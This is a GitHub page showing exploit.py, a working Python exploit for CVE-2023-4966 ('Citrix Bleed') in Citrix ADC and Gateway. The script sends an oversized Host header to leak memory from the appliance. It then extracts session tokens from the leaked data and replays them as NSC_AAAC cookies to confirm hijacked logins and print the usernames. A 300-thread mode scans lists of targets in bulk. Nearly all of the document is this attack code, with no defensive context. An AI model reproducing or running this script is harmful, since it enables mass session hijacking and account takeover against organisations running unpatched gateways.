-
Notifications
You must be signed in to change notification settings - Fork 12
/
Copy pathexploit.py
163 lines (136 loc) · 7.25 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
import re
import sys
import hexdump
import argparse
import requests
from rich.console import Console
from urllib.parse import urlparse
from alive_progress import alive_bar
from typing import List, Tuple, Optional, TextIO
from concurrent.futures import ThreadPoolExecutor, as_completed
warnings = requests.packages.urllib3
warnings.disable_warnings(warnings.exceptions.InsecureRequestWarning)
class CitrixMemoryDumper:
def __init__(self):
self.console = Console()
self.parser = argparse.ArgumentParser(description='Citrix ADC Memory Dumper')
self.setup_arguments()
self.results: List[Tuple[str, str]] = []
self.output_file: Optional[TextIO] = None
if self.args.output:
self.output_file = open(self.args.output, 'w')
def setup_arguments(self) -> None:
self.parser.add_argument('-u', '--url', help='The Citrix ADC / Gateway target (e.g., https://192.168.1.200)')
self.parser.add_argument('-f', '--file', help='File containing a list of target URLs (one URL per line)')
self.parser.add_argument('-o', '--output', help='File to save the output results')
self.parser.add_argument('-v', '--verbose', action='store_true', help='Enable verbose mode')
self.parser.add_argument('--only-valid', action='store_true', help='Only show results with valid sessions')
self.args = self.parser.parse_args()
def print_results(self, header: str, result: str) -> None:
if self.args.only_valid and "[+]" not in header:
return
formatted_msg = f"{header} {result}"
self.console.print(formatted_msg, style="white")
if self.output_file:
self.output_file.write(result + '\n')
def normalize_url(self, url: str) -> str:
if not url.startswith("http://") and not url.startswith("https://"):
url = f"https://{url}"
parsed_url = urlparse(url)
normalized_url = f"{parsed_url.scheme}://{parsed_url.netloc}"
return normalized_url
def dump_memory(self, url: str) -> None:
full_url = self.normalize_url(url)
headers = {
"Host": "a" * 24576
}
try:
r = requests.get(
f"{full_url}/oauth/idp/.well-known/openid-configuration",
headers=headers,
verify=False,
timeout=10,
)
content_bytes = r.content
if r.status_code == 200 and content_bytes:
if b"\x00"*16 in content_bytes:
cleaned_content = self.clean_bytes(content_bytes)
for _ in range(10):
cleaned_content = cleaned_content.replace(b'a'*65, b'').replace(b'a'*32, b'')
content_bytes = content_bytes.replace(b'a'*65, b'').replace(b'a'*32, b'')
if self.args.verbose and self.args.url:
self.results.append(("[bold blue][*][/bold blue]", f"Memory Dump for {full_url}"))
hex_output = hexdump.hexdump(content_bytes, result='return').strip()
self.results.extend([("", line) for line in hex_output.splitlines()])
self.results.append(("[bold blue][*][/bold blue]", "End of Dump\n"))
session_tokens = self.find_session_tokens(content_bytes)
valid_token_found = False
for token in session_tokens:
if self.test_session_cookie(full_url, token):
valid_token_found = True
if not valid_token_found:
if not self.args.only_valid:
if self.args.url:
self.results.append(("[bold yellow][!][/bold yellow]", f"Partial memory dump but no valid session token found for {full_url}."))
else:
self.results.append(("[bold green][+][/bold green]", f"Vulnerable to CVE-2023-4966. Endpoint: {full_url}, but no valid session token found."))
elif self.args.verbose and self.args.url:
self.results.append(("[bold red][-][/bold red]", f"Could not dump memory for {full_url}."))
except Exception as e:
if self.args.verbose and self.args.url:
self.results.append(("[bold red][-][/bold red]", f"Error processing {full_url}: {str(e)}."))
def clean_bytes(self, data: bytes) -> bytes:
return b''.join(bytes([x]) for x in data if 32 <= x <= 126)
def find_session_tokens(self, content_bytes: bytes) -> List[str]:
TOKEN_65_PATTERN = re.compile(rb'(?=([a-f0-9]{65}))')
TOKEN_32_PATTERN = re.compile(rb'(?=([a-f0-9]{32}))')
sessions_65 = [match.group(1).decode('utf-8') for match in TOKEN_65_PATTERN.finditer(content_bytes) if match.group(1).endswith(b'45525d5f4f58455e445a4a42') and not match.group(1).startswith(b'a'*65)]
sessions_32 = [match.group(1).decode('utf-8') for match in TOKEN_32_PATTERN.finditer(content_bytes) if not match.group(1).startswith(b'a'*32)]
combined_sessions = list(dict.fromkeys(sessions_65 + sessions_32))
return combined_sessions
def test_session_cookie(self, url: str, session_token: str) -> bool:
headers = {
"Cookie": f"NSC_AAAC={session_token}"
}
try:
r = requests.post(
f"{url}/logon/LogonPoint/Authentication/GetUserName",
headers=headers,
verify=False,
timeout=10,
)
if r.text.count('\n') > 0:
return False
if r.status_code == 200:
username = r.text.strip()
self.results.append(("[bold green][+][/bold green]", f"Vulnerable to CVE-2023-4966. Endpoint: {url}, Cookie: {session_token}, Username: {username}"))
return True
else:
return False
except Exception as e:
if self.args.verbose and self.args.url:
self.results.append(("[bold red][-][/bold red]", f"Error testing cookie for {url}: {str(e)}."))
return False
def run(self) -> None:
if self.args.url:
self.dump_memory(self.args.url)
for header, result in self.results:
self.print_results(header, result)
elif self.args.file:
with open(self.args.file, 'r') as file:
urls = file.read().splitlines()
with ThreadPoolExecutor(max_workers=300) as executor, alive_bar(len(urls), bar='smooth', enrich_print=False) as bar:
futures = {executor.submit(self.dump_memory, url): url for url in urls}
for future in as_completed(futures):
for header, result in self.results:
self.print_results(header, result)
self.results.clear()
bar()
else:
self.console.print("[bold red][-][/bold red] URL or File must be provided.", style="white")
sys.exit(1)
if self.output_file:
self.output_file.close()
if __name__ == "__main__":
dumper = CitrixMemoryDumper()
dumper.run()